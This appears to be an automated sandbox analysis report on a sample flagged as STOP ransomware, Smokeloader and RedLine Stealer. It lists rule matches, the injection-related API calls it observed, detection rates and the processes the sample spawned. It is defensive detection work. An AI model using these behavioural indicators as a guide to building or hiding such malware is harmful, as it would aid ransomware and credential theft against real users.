                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: String function: 0040EAC8 appears 37 times
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: String function: 004097B4 appears 33 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040EAB8 appears 38 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402241 NtQuerySystemInformation,0_2_00402241
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040224D NtQuerySystemInformation,0_2_0040224D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402251 NtQuerySystemInformation,0_2_00402251
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401577
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402219 NtQuerySystemInformation,0_2_00402219
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B NtQuerySystemInformation,0_2_0040221B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection,0_2_00401727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401581
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401584
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D7E5 __crt_waiting_on_module_handle,NtQuerySystemInformation,RtlEncodePointer,0_2_0040D7E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C09D __setlocale_set_cat,NtQuerySystemInformation,_strpbrk,_strncmp,_strlen,_strcspn,__invoke_watson,__setlocale_set_cat,__expandlocale,__setlocale_set_cat,__setlocale_get_all,0_2_0040C09D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D94C __crt_waiting_on_module_handle,NtQuerySystemInformation,__lock,__lock,___addlocaleref,0_2_0040D94C
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@24/24@23/11
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,4_2_00404AE9
                Source: file.exeVirustotal: Detection: 38%
                Source: file.exeReversingLabs: Detection: 43%
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\thduhcf C:\Users\user\AppData\Roaming\thduhcf
